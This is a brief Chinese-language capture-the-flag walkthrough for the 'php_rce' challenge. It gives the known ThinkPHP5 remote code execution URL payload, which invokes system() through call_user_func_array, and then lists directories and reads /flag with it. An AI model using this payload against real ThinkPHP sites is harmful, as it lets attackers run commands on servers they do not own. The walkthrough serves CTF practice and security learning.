攻防世界(四)php_rce


攻防世界系列:php_rce

 

1.打开题目

看到这个还是很懵的,点开任意连接都是真实的场景。

 

 2.ThinkPHP5,这里我们需要知道它存在

远程代码执行的漏洞。

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令)

ls查看

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

 

上一级 ls ../

 

根目录下 ls /

 

 发现 flag打开flag   cat /flag

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM